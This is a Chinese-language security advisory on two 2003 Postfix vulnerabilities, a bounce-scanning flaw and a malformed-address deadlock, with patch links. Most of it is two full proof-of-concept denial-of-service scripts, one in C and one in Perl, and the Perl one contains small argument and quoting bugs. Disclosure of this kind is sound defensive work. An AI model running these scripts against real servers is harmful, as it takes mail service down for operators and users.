Multiple Postfix多个拒绝服务攻击漏洞发布时间:2003-08-04 更新时间:2003-08-07 严重程度:高 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8333 受影响系统 Wietse Venema Postfix 20011115详细描述 Debian报告了Postfix邮件传送代理程序存在的两个漏洞。第一个漏洞的CVE编号为CAN-2003-0468,利用此漏洞可以强制Postfix扫描一个内部网络,此漏洞还可能被利用使服务器成为一个分布式拒绝服务攻击的工具,因为利用此漏洞可以使服务器连接任一服务器的任一端口。 第二个漏洞的CVE编号为CAN-2003-0540,是一个拒绝服务攻击漏洞,一个带恶意地址的邮件会导致服务器程序的死锁直到此邮件被手工从队列中删除为止。此漏洞也可能导致锁死SMTP监听程序,而导致拒绝服务。 测试代码 /* postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl> ------------------------------------------------ remote/local Postfix up to (including) 1.1.12 DoS discovered by lcamtuf <lcamtuf@coredump.cx> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <unistd.h> #include <arpa/inet.h> int sock = 0; void get_response(void); void say(char *it); int main(int argc, char* argv[]) { struct hostent *hp; struct sockaddr_in addr; printf("postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>\n"); if (argc<2) { printf("usage: %s <smtpserver>\n", argv[0]); exit(0); } hp=gethostbyname(argv[1]); if (!hp) { printf("can't resolve %s\n", argv[1]); exit(0); } bzero((char *)&addr, sizeof(addr)); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("can't create socket\n"); exit(0); } bcopy(hp->h_addr, (char *)&addr.sin_addr, hp->h_length); addr.sin_family=AF_INET; addr.sin_port=htons(25); if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))!=0) { printf("can't connect to %s\n", argv[1]); close(sock); exit(0); } get_response(); say("helo host\r\n"); say("mail from: <.!>\r\n"); say("rcpt to: <someuser123@[127.0.0.1]>\r\n"); /* now should be freezed */ shutdown(sock, 2); close(sock); printf("done.\n"); return 0; } void get_response(void) { char buff[64]; recv(sock, buff, sizeof(buff), 0); if (buff[0]!='2' && buff[0]!='3') printf("%s", buff); } void say(char *it) { send(sock, it, strlen(it), 0); get_response(); } #!/usr/bin/perl #Remote Dos for postfix version 1.1.12 #tested on redhat 9.0, redhat 8.0, mandrake 9.0 #deadbeat, #mail: daniels@legend.co.uk # deadbeat@sdf.lonestar.org # #thanks..enjoy ;) use IO::Socket; if (!$ARGV[3]){ die "Usage:perl $0 <subject> <data> <smtp host to use>\n"; } $subject = $ARGV[0]; $junk = $ARGV[1]; $smtp_host = $ARGV[2]; $helo = "HELO $smtp_host\r\n"; $rcpt = "RCPT To:<nonexistant@127.0.0.1>\r\n"; $data = "DATA\n$junk\r\n"; $sub = "Subject: $subject\r\n"; $from = "MAIL From <.!@$smtp_host>\r\n"; print "Going to connect to $smtp_host\n"; $sox = IO::Socket::INET->new( Proto=> 'tcp', PeerPort=>'25', PeerAddr=>'$smtp_host', ); print "Connected...\n"; print $sox $helo; sleep 1; print $sox $from; sleep 1; print $sox $rcpt; sleep 1; print $sox $sub; sleep 1; print $sox $data; sleep 1; print $sox ".\r\n\r\n"; sleep 1; close $sox; print "Done..should lock up Postfix 1.1.12 and below ;)\n\n"; 解决方案 厂商已经在最新版本的软件中修补了此漏洞: Wietse Venema Postfix 20010228: Trustix Upgrade postfix-0.0.20010228.pl08-4tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/postfix-0.0.20010228.pl08-4tr.i586.rpm Wietse Venema Postfix 19991231: Trustix Upgrade postfix-19991231_pl13-4tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/postfix-19991231_pl13-4tr.i586.rpm 相关信息 Postfix 1.1.12 remote DoS / Postfix 1.1.11 bounce scanning http://archives.neohapsis.com/archives/bugtraq/2003-08/0027.html Postfix: old bugs keep coming back http://archives.neohapsis.com/archives/bugtraq/2003-08/0061.html |
